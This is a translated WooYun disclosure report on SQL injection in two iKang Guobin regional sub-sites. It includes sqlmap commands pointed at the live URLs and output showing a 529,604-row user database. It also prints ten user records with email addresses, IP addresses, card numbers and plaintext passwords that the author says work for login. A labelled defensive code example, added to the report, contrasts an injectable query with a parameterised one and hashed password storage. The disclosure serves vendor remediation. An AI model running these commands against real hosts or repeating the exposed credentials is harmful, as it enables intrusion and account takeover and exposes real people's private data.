
Vulnerability summary

Defect ID: wooyun-2014-074210

Title: iKang Guobin (爱康国宾): two more SQL injection points put 500,000 main-site user records at risk of leakage

Vendor: 爱康国宾 (iKang Guobin)

Author: 花花酱

Submitted: 2014-08-28 15:46

Fixed: 2014-10-12 15:48

Published: 2014-10-12 15:48

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2014-08-28: details sent to the vendor; awaiting vendor handling
2014-08-29: vendor confirmed; details disclosed to the vendor only
2014-09-08: details disclosed to core white hats and domain experts
2014-09-18: details disclosed to regular white hats
2014-09-28: details disclosed to intern white hats
2014-10-12: details disclosed to the public

Brief description:

You know the drill: don't store them in plaintext.

Detailed description:

Don't store passwords in plaintext!
iKang has many regional sub-sites on subdomains. Some of these subdomains have anti-injection handling and some don't; no idea why.
Two more sub-sites with SQL injection turned up:

sqlmap.py -u "http://xzm.ikang.com/news_article.php?id=1" --random-agent --dbs
sqlmap.py -u "http://cdhzb.ikang.com/news_article.php?id=1" --random-agent


By the look of it, many sub-sites and other applications share the same database: this injection point likewise has access to 33 databases. Take the `web` database as an example; it should be the main site's database. The records of 500,000 registered users are stored in plaintext, passwords included.

[13:41:56] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 4.9
web application technology: PHP 4.4.2, Apache 2.0.52
back-end DBMS: MySQL 5.0.11
[13:41:56] [INFO] resumed: 529604
Database: web
+--------+---------+
| Table | Entries |
+--------+---------+
| `user` | 529604 |
+--------+---------+
[13:41:56] [INFO] fetched data logged to text files under '/home/litdg/workspace/sqlmap/output/cqhnb.ikang.com'


The passwords tested allow login to the main site.

web server operating system: Linux CentOS 4.9
web application technology: PHP 4.4.2, Apache 2.0.52
back-end DBMS: MySQL 5.0.11
Database: web
Table: user
[10 entries]
+----+------------------+--------+----------+-----------------+---------+---------+---------+-------------------------+--------+---------+--------------------------------+----------+-----------+
| id | cardid | corpid | memberid | ip | city | type | title | email | status | content | nickname | keywords | password |
+----+------------------+--------+----------+-----------------+---------+---------+---------+-------------------------+--------+---------+--------------------------------+----------+-----------+
| 1 | 7000000000000001 | 2383 | 300535 | 60.194.121.93 | <blank> | <blank> | <blank> | raymond.du@ikang.com | 1 | <blank> | Raymond | <blank> | soso |
| 2 | 0021000000157444 | 206 | NULL | 61.129.127.226 | <blank> | <blank> | <blank> | roquel@163.com | 0 | <blank> | RoqueL | <blank> | anichr |
| 3 | 1111000000012757 | 2383 | NULL | 124.203.150.151 | <blank> | <blank> | <blank> | lm_irena@sina.com | 0 | <blank> | lm_irena | <blank> | 596621 |
| 4 | NULL | NULL | NULL | 222.35.170.153 | <blank> | <blank> | <blank> | judy@ikang.com | 0 | <blank> | Judy | <blank> | anichr |
| 5 | 1111000000016090 | 2383 | NULL | 218.23.34.152 | <blank> | <blank> | <blank> | mayimin@ah163.com | 0 | <blank> | mayimin | <blank> | 550223 |
| 6 | NULL | NULL | NULL | 219.142.174.152 | <blank> | <blank> | <blank> | nuo.zha@ikang.com | 0 | <blank> | Divine | <blank> | 123456 |
| 7 | 7000000000000003 | 2383 | NULL | 61.51.225.93 | <blank> | <blank> | <blank> | motuo12345@yahoo.com.cn | 0 | <blank> | motuo12345 | <blank> | 453392123 |
| 8 | NULL | NULL | NULL | NULL | <blank> | <blank> | <blank> | yaolan01@126.com | 0 | <blank> | 412545 | <blank> | ikang1371 |
| 9 | 1111000000016999 | 2383 | NULL | 218.19.161.78 | <blank> | <blank> | <blank> | kong168@163.com | 0 | <blank> | kong168168 | <blank> | 65124104 |
| 10 | 7000000000000004 | 2383 | NULL | 222.130.86.172 | <blank> | <blank> | <blank> | yaolan01@126.com | 0 | <blank> | \\?d2\\?a6\\?bd\\?f0\\?c0\\?bc | <blank> | ikang1371 |
+----+------------------+--------+----------+-----------------+---------+---------+---------+-------------------------+--------+---------+--------------------------------+----------+-----------+
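As an added defensive example (not code from the report, from iKang, or from sqlmap), the following Python shows the two problems the report describes side by side: a query that splices the `id` request parameter straight into SQL, the pattern behind a `news_article.php?id=1` endpoint that sqlmap can drive, next to a validated, parameterised version; and a `user` table that stores salted PBKDF2 hashes instead of plaintext passwords. The table layout, article titles, e-mail addresses and passwords are constructed sample data, and SQLite stands in for MySQL.

```python
import hashlib
import hmac
import os
import sqlite3
from typing import Optional

# Constructed sample data standing in for a `web.user`-style table; the
# addresses and passwords are made up, not taken from the report.
SAMPLE_USERS = [
    ("alice@example.invalid", "correct horse battery"),
    ("bob@example.invalid", "123456"),
]
SAMPLE_ARTICLES = [(1, "Public notice"), (2, "Internal memo")]

PBKDF2_ITERATIONS = 600_000  # OWASP-level work factor for PBKDF2-HMAC-SHA256


def hash_password(password: str, salt: Optional[bytes] = None) -> str:
    """Return a self-describing 'pbkdf2_sha256$iter$salt_hex$hash_hex' string.

    A fresh 16-byte random salt per user means two users with the same
    password get different stored values, unlike the plaintext dump above.
    """
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    return f"pbkdf2_sha256${PBKDF2_ITERATIONS}${salt.hex()}${digest.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute the hash with the stored salt and compare in constant time."""
    algo, iterations, salt_hex, hash_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    digest = hashlib.pbkdf2_hmac(
        "sha256", password.encode(), bytes.fromhex(salt_hex), int(iterations)
    )
    return hmac.compare_digest(digest.hex(), hash_hex)


def build_db() -> sqlite3.Connection:
    """Create an in-memory database with a news table and a hashed user table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT)")
    conn.execute("CREATE TABLE user (id INTEGER PRIMARY KEY, email TEXT, password TEXT)")
    conn.executemany("INSERT INTO news VALUES (?, ?)", SAMPLE_ARTICLES)
    conn.executemany(
        "INSERT INTO user (email, password) VALUES (?, ?)",
        [(email, hash_password(pw)) for email, pw in SAMPLE_USERS],
    )
    return conn


def article_vulnerable(conn: sqlite3.Connection, raw_id: str) -> list:
    # The injectable pattern: the request value becomes part of the SQL text,
    # so the caller controls the WHERE clause (and, via UNION, other tables).
    return conn.execute(f"SELECT id, title FROM news WHERE id = {raw_id}").fetchall()


def article_safe(conn: sqlite3.Connection, raw_id: str) -> list:
    # Hardened form: reject anything that is not an integer, then bind the
    # value as a parameter so the SQL text never changes with user input.
    if not raw_id.isdigit():
        return []
    return conn.execute(
        "SELECT id, title FROM news WHERE id = ?", (int(raw_id),)
    ).fetchall()


def login(conn: sqlite3.Connection, email: str, password: str) -> bool:
    """Parameterised lookup plus hash verification; never compares cleartext."""
    row = conn.execute("SELECT password FROM user WHERE email = ?", (email,)).fetchone()
    return row is not None and verify_password(password, row[0])


if __name__ == "__main__":
    db = build_db()
    print("safe, id=1:", article_safe(db, "1"))
    print("safe, tautology:", article_safe(db, "1 OR 1=1"))
    print("vulnerable, tautology:", article_vulnerable(db, "1 OR 1=1"))
    print("login ok:", login(db, "alice@example.invalid", "correct horse battery"))
```

With the parameterised version, the tautology input that returns every article from the vulnerable function returns nothing, and the stored `password` column holds only salted hashes, so a table dump like the one above no longer yields working credentials outright. The sub-sites in the report run PHP 4.4.2, which predates `password_hash()`; on any supported PHP the same two changes are PDO prepared statements and `password_hash()`/`password_verify()`.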


Proof of vulnerability: (the same `user` table dump as above)


Fix recommendation:

Copyright notice: when reposting, please credit the source: 花花酱@乌云


Vulnerability responses

Vendor response:

Severity: High

Vulnerability Rank: 20

Confirmed: 2014-08-29 14:44

Vendor reply:

Vulnerability confirmed; we will fix it immediately. Thanks!

Latest status:

None yet


Vulnerability rating:

Comments

  1. 2014-08-29 18:54 | 猪猪侠, certified white hat (core white hat | Rank: 3224, vulnerabilities: 254 | You already have so many super lollipops, what do you need freedom for?)

    @爱康国宾 I went to your place for a checkup last week and got scared into doing the full package!!! http://weibo.com/1859213130/BiPajeabp?mod=weibotime Would you consider running a crowdsourced testing project on WooYun, so I can earn back the checkup fee I got fleeced for?